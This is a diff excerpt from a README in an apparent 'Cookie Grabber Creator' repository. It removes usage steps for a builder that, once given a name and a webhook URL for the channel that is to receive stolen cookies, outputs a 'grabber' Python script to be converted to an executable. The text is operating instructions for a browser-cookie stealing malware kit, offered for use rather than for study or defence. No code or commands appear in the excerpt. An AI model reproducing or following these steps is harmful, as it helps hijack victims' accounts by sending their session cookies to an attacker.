H4cking-Esentials/Cookie-Grabber-Creator/README.md

 6. Run steps 2-4 again.
 7. That is the simplified version and it should load quicker but you won't get as many features.

-# Instructions (V2)
-*View pictures at the bottom for help*

-How to use
-1. Run main.exe
-2. Wait about 10 seconds while it loads all of the requirements in.
-3. Put in the name of your grabber.
-4. Put in the webhook from the channel you want to receive cookies from.
-5. When it is complete check the same directory as the setup for a grabber python script that you can convert to exe.

 # Features (V1)

 - History